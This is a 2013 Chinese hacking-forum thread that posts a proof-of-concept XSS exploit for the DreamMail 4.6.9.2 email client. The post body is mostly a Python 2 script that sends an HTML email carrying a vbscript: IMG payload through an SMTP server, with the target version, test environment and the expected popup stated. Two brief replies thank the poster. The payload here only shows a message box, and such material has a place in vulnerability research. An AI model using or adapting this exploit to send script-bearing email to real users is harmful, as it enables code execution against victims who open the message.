搜索
查看: 426|回复: 2

Dreammail V4.6.9.2 XSS漏洞利用

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-9-5 20:09:55 来自手机 | 显示全部楼层 |阅读模式
针对版本:DreamMail 4.6.9.2
测试环境:windows xp sp3
python版本:2.6
测试邮箱:126.com

#-*- coding:UTF-8 -*-  #@小五义 http://www.cnblogs.com/xiaowuyi import smtplib, urllib2

payload = '''<IMG SRC='vbscript:msgbox("Hello world!")'>''' def sendMail(toemail, smtpsrv, username, password):
        msg = "From: XXXX@126.com\n" msg += "To:YYYY@126.com\n" msg += 'Date: Today\r\n' msg += "Subject: xss payload\n" msg += "Content-type: text/html\n\n" msg += payload + "\r\n\r\n" server = smtplib.SMTP()
        server.connect(smtpsrv)
        server.login(username,password) try:
                server.sendmail(username, toemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e)
        server.quit()

username = "XXXX@126.com" #也可使用其它邮件服务器 password = "XXXXX" #密码 toemail = "YYYY@126.com" smtpsrv = "smtp.126.com" print "[*] Sending Email" sendMail(toemail, smtpsrv, username, password)

发送成功后,当用dreammail浏览该邮件时,会弹窗提示:Hello word!
仅供测试之用
专业回帖 该用户已被删除
发表于 2013-9-5 20:47:14 | 显示全部楼层
支持一下
专业回帖 该用户已被删除
发表于 2013-9-5 20:59:22 | 显示全部楼层
学习了,谢谢分享、、、
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表